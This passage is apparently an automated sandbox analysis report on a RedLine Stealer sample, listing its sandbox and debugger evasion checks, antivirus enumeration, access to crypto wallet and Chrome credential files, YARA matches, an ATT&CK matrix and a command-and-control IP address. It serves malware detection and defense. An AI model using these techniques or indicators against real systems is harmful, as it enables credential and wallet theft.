                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exe TID: 4764Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exe TID: 6996Thread sleep count: 4207 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exe TID: 5864Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-37593
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-37507
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeWindow / User API: threadDelayed 4207Jump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeAPI call chain: ExitProcess graph end nodegraph_0-37595
                  Source: Igv6ymbAA3.exe, 00000000.00000002.401283248.0000000000A50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0040ADB0 GetProcessHeap,HeapFree,0_2_0040ADB0
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0241092B mov eax, dword ptr fs:[00000030h]0_2_0241092B
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_02410D90 mov eax, dword ptr fs:[00000030h]0_2_02410D90
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040E61C
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00416F6A
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_004123F1 SetUnhandledExceptionFilter,0_2_004123F1
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0241D070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0241D070
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_0241E883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0241E883
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_024271D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_024271D1
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_02422658 SetUnhandledExceptionFilter,0_2_02422658
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: GetLocaleInfoA,0_2_00417A20
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: GetLocaleInfoA,0_2_02427C87
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeCode function: 0_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00412A15
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.3.Igv6ymbAA3.exe.2450000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.262f71e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.Igv6ymbAA3.exe.9ee370.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.2700ee8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.2700000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.262f71e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.2850000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.262e836.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.2700ee8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.2410e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.262e836.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.2850000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.2700000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.Igv6ymbAA3.exe.9ee370.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.402241386.0000000002850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.350331599.0000000002450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.401980636.00000000025EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.402147783.0000000002700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.350614100.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Igv6ymbAA3.exe PID: 5896, type: MEMORYSTR
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\Igv6ymbAA3.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: Yara matchFile source: 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Igv6ymbAA3.exe PID: 5896, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 0.3.Igv6ymbAA3.exe.2450000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.262f71e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.Igv6ymbAA3.exe.9ee370.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.2700ee8.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.2700000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.262f71e.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.2850000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.262e836.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.2700ee8.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.2410e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.262e836.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.2850000.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Igv6ymbAA3.exe.2700000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.Igv6ymbAA3.exe.9ee370.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.400990974.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.402241386.0000000002850000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.350331599.0000000002450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.401980636.00000000025EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.402147783.0000000002700000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.350614100.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.401518261.0000000002410000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Igv6ymbAA3.exe PID: 5896, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts221
                  Windows Management Instrumentation                  		Path InterceptionPath Interception1
                  Masquerading                  		1
                  OS Credential Dumping                  		1
                  System Time Discovery                  		Remote Services1
                  Input Capture                  		Exfiltration Over Other Network Medium1
                  Encrypted Channel                  		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts2
                  Command and Scripting Interpreter                  		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                  Disable or Modify Tools                  		1
                  Input Capture                  		251
                  Security Software Discovery                  		Remote Desktop Protocol1
                  Archive Collected Data                  		Exfiltration Over Bluetooth1
                  Non-Standard Port                  		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts2
                  Native API                  		Logon Script (Windows)Logon Script (Windows)231
                  Virtualization/Sandbox Evasion                  		Security Account Manager231
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin Shares2
                  Data from Local System                  		Automated Exfiltration1
                  Application Layer Protocol                  		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Deobfuscate/Decode Files or Information                  		NTDS12
                  Process Discovery                  		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common22
                  Software Packing                  		Cached Domain Credentials134
                  System Information Discovery                  		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Igv6ymbAA3.exe41%VirustotalBrowse
                  Igv6ymbAA3.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                  http://tempuri.org/0%URL Reputationsafe
                  http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id90%URL Reputationsafe
                  http://tempuri.org/Entity/Id80%URL Reputationsafe
                  http://tempuri.org/Entity/Id50%URL Reputationsafe
                  http://tempuri.org/Entity/Id40%URL Reputationsafe
                  http://tempuri.org/Entity/Id40%URL Reputationsafe
                  http://tempuri.org/Entity/Id70%URL Reputationsafe
                  http://tempuri.org/Entity/Id60%URL Reputationsafe
                  http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id22Response(0%URL Reputationsafe
                  http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
                  https://api.ip.sb/ip0%URL Reputationsafe
                  http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id200%URL Reputationsafe
                  http://tempuri.org/Entity/Id210%URL Reputationsafe
                  http://tempuri.org/Entity/Id220%URL Reputationsafe
                  http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id100%URL Reputationsafe
                  http://tempuri.org/Entity/Id100%URL Reputationsafe
                  http://tempuri.org/Entity/Id110%URL Reputationsafe
                  http://tempuri.org/Entity/Id120%URL Reputationsafe
                  http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id130%URL Reputationsafe
                  http://tempuri.org/Entity/Id130%URL Reputationsafe
                  http://tempuri.org/Entity/Id140%URL Reputationsafe
                  http://tempuri.org/Entity/Id150%URL Reputationsafe
                  http://tempuri.org/Entity/Id160%URL Reputationsafe
                  http://tempuri.org/Entity/Id170%URL Reputationsafe
                  http://tempuri.org/Entity/Id180%URL Reputationsafe
                  http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id190%URL Reputationsafe
                  http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
                  http://tempuri.org/Entity/Id19Response$90%Avira URL Cloudsafe
                  51.210.170.199:233680%Avira URL Cloudsafe
                  51.210.170.199:233680%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  51.210.170.199:23368true
                  • 0%, Virustotal, Browse
                  • Avira URL Cloud: safe
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#TextIgv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://schemas.xmlsoap.org/ws/2005/02/sc/sctIgv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://duckduckgo.com/chrome_newtabIgv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D9F000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003BC5000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002E0B000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003D3F000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002C65000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003CA4000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AC4000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003BA8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003DBC000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002BD8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C26000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkIgv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/ac/?q=Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002BD8000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003AA7000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.403988658.0000000003C26000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryIgv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://tempuri.org/Entity/Id12ResponseIgv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://tempuri.org/Igv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://tempuri.org/Entity/Id2ResponseIgv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://tempuri.org/Entity/Id21ResponseIgv6ymbAA3.exe, 00000000.00000002.402656262.0000000002921000.00000004.00000800.00020000.00000000.sdmp, Igv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_WrapIgv6ymbAA3.exe, 00000000.00000002.402656262.00000000029B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
